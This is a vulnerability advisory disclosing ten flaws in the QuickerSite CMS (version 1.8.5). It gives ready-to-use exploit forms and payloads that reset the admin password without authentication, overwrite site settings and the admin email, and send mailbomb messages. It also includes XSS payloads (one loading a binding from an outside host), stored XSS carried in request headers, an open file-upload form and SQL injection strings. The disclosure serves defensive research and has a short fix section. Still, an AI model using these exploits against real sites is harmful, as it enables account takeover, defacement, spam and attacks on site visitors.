########################## www.BugReport.ir ####################################### # # AmnPardaz Security Research Team # # Title: QuickerSite Multiple Vulnerabilities # Vendor: www.quickersite.com # Vulnerable Version: 1.8.5 # Exploit: Available # Impact: High # Fix: N/A # Original Advisory: http://bugreport.ir/index.php?/39 ################################################################################### #################### 1. Description: #################### QuickerSite is a Content Management System for Windows Servers. It is written in ASP/VBScript with an optional pinch of ASP.NET for true image-resizing capabilities. QuickerSite ships with an Access database, with the option to upsize to SQL Server 2000/2005 for busy sites (>1000 visitors/day). #################### 2. Vulnerabilities: #################### 2.1. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can change admin password. 2.1.1. Exploit: Check the exploit section. 2.2. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site info., such as admin email address. 2.2.1. Exploit: Check the exploit section. 2.3. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site design. (Also, all the site settings can be changed by other parameters) 2.3.1. Exploit: Check the exploit section. 2.4. Failure to Restrict URL Access [in "mailPage.asp"]. Everyone can mailbomb others. 2.4.1. Exploit: Check the exploit section. 2.5. Cross Site Scripting (XSS) [in "showThumb.aspx"]. Reflected XSS attack by circumventing the ASP.Net XSS denier (Path disclosure on the open error mode). 2.5.1. Exploit: Check the exploit section. 2.6. Cross Site Scripting (XSS), Failure to Restrict URL Access [in "process_send.asp"]. Redirect Reflected XSS Attack In "SB_redirect" parameter. Reflected XSS, Content Spoofing In "SB_feedback" parameter. Everyone can mailbomb others. 2.6.1. Exploit: Check the exploit section. 2.7. Cross Site Scripting (XSS) [in "picker.asp"]. Reflected XSS attack in "paramCode" and "cColor" parameters. 2.7.1. Exploit: Check the exploit section. 2.8. Cross Site Scripting (XSS) [in "rss.asp"]. Stored XSS attack in "X-FORWARDED-FOR","QueryString","Referer"" header parameter. Attacker can execute an XSS against Admin. 2.8.1. Exploit: Check the exploit section. 2.9. File uploading is allowed by FCKEDITOR. 2.9.1. Exploit: Check the exploit section. 2.10. Injection Flaws [in "/asp/includes/contact.asp"]. SQL Injection on "check" function in "sNickName" parameter. 2.10.1. Exploit: Check the exploit section. #################### 3. Exploits: #################### Original Exploit URL: http://bugreport.ir/index.php?/39/exploit 3.1. Everyone can change admin password. ------------- <form action="http://[URL]/asp/bs_login.asp?btnAction=cSaveAdminPW" method="post"> adminPassword: <input type="text" name="adminPassword" value="" size="30" /><br /> adminPasswordConfirm: <input type="text" name="adminPasswordConfirm" value="" size="30" /><br /> <input type="submit" /> </form> ------------- 3.2. Everyone can edit all the site info., such as admin email address. ------------- <form action="http://[URL]/asp/bs_login.asp?btnAction=saveAdmin" method="post"> Site Url: <input type="text" name="sUrl" value="http://www.VICTIM.com" size="100" /><br /> Site AlternateDomains: <input type="text" name="sAlternateDomains" value="http://www.VICTIM-Backup.com" size="100" /><br /> Description: <input type="text" name="sDescription" value="Hacked Description" size="100" /><br /> Site Name: <input type="text" name="siteName" value="Hacked Site Name" size="100" /><br /> Site Title: <input type="text" name="siteTitle" value="Hacked Site Title" size="100" /><br /> CopyRight: <input type="text" name="copyRight" value="Hacked CopyRight" size="100" /><br /> Keywords: <input type="text" name="keywords" value="Hacked KeyWords" size="100" /><br /> Google Analytics: <input type="text" name="googleAnalytics" value="Hacked Google Anal!" size="100" /><br /> Language: <input type="text" name="language" value="1" size="100" /><br /> DatumFormat: <input type="text" name="sDatumFormat" value="1" size="100" /><br /> Webmaster: <input type="text" name="webmaster" value="Hacker" size="100" /><br /> Webmaster Email: <input type="text" name="webmasterEmail" value="MyEmail-ResetPassword_at_Hacker&#46;Com" size="100" /><br /> Default RSS Link: <input type="text" name="sDefaultRSSLink" value="http://www.VICTIM.com/RSS.asp" size="100" /><br /> <input type="submit" /> </form> ------------- 3.3. Everyone can edit all the site design. ------------- <form action="http://[URL]/asp/bs_login.asp?btnAction=saveDesign" method="post"> siteWidth: <input type="text" name="siteWidth" value="800" size="30" /><br /> menuWidth: <input type="text" name="menuWidth" value="600" size="30" /><br /> bgColorSides: <input type="text" name="bgColorSides" value="" size="30" /><br /> bgImageLeft: <input type="text" name="bgImageLeft" value="" size="30" /><br /> bgImageRight: <input type="text" name="bgImageRight" value="" size="30" /><br /> mainBGColor: <input type="text" name="mainBGColor" value="" size="30" /><br /> mainBgImage: <input type="text" name="mainBgImage" value="" size="30" /><br /> scheidingsLijnColor: <input type="text" name="scheidingsLijnColor" value="" size="30" /><br /> scheidingsLijnWidth: <input type="text" name="scheidingsLijnWidth" value="100" size="30" /><br /> menuBGColor: <input type="text" name="menuBGColor" value="" size="30" /><br /> menuBGImage: <input type="text" name="menuBGImage" value="" size="30" /><br /> menuBorderColor: <input type="text" name="menuBorderColor" value="" size="30" /><br /> MenuHoverBGColor: <input type="text" name="MenuHoverBGColor" value="" size="30" /><br /> subMenuBorderColor: <input type="text" name="subMenuBorderColor" value="" size="30" /><br /> fontType: <input type="text" name="fontType" value="" size="30" /><br /> fontColor: <input type="text" name="fontColor" value="" size="30" /><br /> linkColor: <input type="text" name="linkColor" value="" size="30" /><br /> fontSize: <input type="text" name="fontSize" value="10" size="30" /><br /> fontWeight: <input type="text" name="fontWeight" value="10" size="30" /><br /> publicIconColor: <input type="text" name="publicIconColor" value="" size="30" /><br /> publicIconColorHover: <input type="text" name="publicIconColorHover" value="" size="30" /><br /> siteAlign: <input type="text" name="siteAlign" value="" size="30" /><br /> menuLocation: <input type="text" name="menuLocation" value="" size="30" /><br /> <input type="hidden" name="defaultTemplate" value="EEE" size="30" /> <input type="submit" /> </form> ------------- 3.4. Everyone can mailbomb others. ------------- <form action="http://[URL]/mailPage.asp?iId=HILHG" method="post"> <input type="text" name="btnAction" value="sendPage" /> <input type="text" name="sEmail" value="" /> <input type="submit" /> </form> ------------- 3.5. Reflected XSS attack by circumventing the ASP.Net XSS denier (Path disclosure on the open error mode). ------------- http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='IRSDL:expr/**/ession(alert("XSS")) (IE) http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22) (Mozilla) http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='IRSDL:expr/**/ession(alert("XSS"));-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22) (IE+Mozilla) http://[URL]/showThumb.aspx (Path disc.) ------------- 3.6. Redirect Reflected XSS Attack In "SB_redirect" parameter in "process_send.asp". Reflected XSS, Content Spoofing In "SB_feedback" parameter in "process_send.asp". Everyone can mailbomb others. ------------- <form action="http://[URL]/default.asp?iId=HILHG&pageAction=send" method="post"> MailTo: <input type="text" name="SB_emailto" value="" size="100" /><br /> Subject: <input type="text" name="SB_subject" value="" size="100" /><br /> Messgae: <input type="text" name="Messgae" value="" size="100" /><br /> SB_feedback: <input type="text" name="SB_feedback" value="XSS" size="100" /><br /> SB_redirect: <input type="text" name="SB_redirect" value="XSS" size="100" /><br /> <input type="submit" /> </form> ------------- 3.7. Reflected XSS attack in "paramCode" and "cColor" parameters in "picker.asp" ------------- http://[URL]/asp/colorpicker/picker.asp?paramCode=pickerPanel.value=''};alert('XSS')</script><script> http://[URL]/asp/colorpicker/picker.asp?cColor=irsdl<script>alert('XSS')</script> ------------- 3.8. Stored XSS attack in "X-FORWARDED-FOR","QueryString","Referer"" header parameter. Attacker can execute an XSS against Admin. ------------- Header must like this: GET /rss.asp?iId=IHJEF&s="'><script>alert('XSS-QueryString!')</script> HTTP/1.1 Host: [URL] User-Agent: Not Referer: FooNotSite.com"'><script>alert('XSS-Referer!')</script> X-FORWARDED-FOR: "'><script>alert('XSS-Proxy!')</script> ACCEPT-LANGUAGE: test Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive ------------- 3.9. File uploading is allowed by FCKEDITOR. ------------- <form enctype="multipart/form-data" action="http://[URL]/fckeditor251/editor/filemanager/connectors/asp/upload.asp" method="post"> <input type="file" name="NewFile"><br> <input type="submit" value="Send it to the Server"> </form> ------------- 3.10. SQL Injection on "check" function in "sNickName" parameter. ------------- http://[URL]/default.asp?pageAction=profile Change "Nickname" to "'or'1'='1" and "'or'1'='2" and see the results ------------- #################### 4. Solution: #################### Edit the source code to ensure that inputs are properly sanitized for 3.5, 3.6, 3.7, 3.8, 3.10, And use access control for others. Note: First check the vendor and look for the patch. #################### - Credit : #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com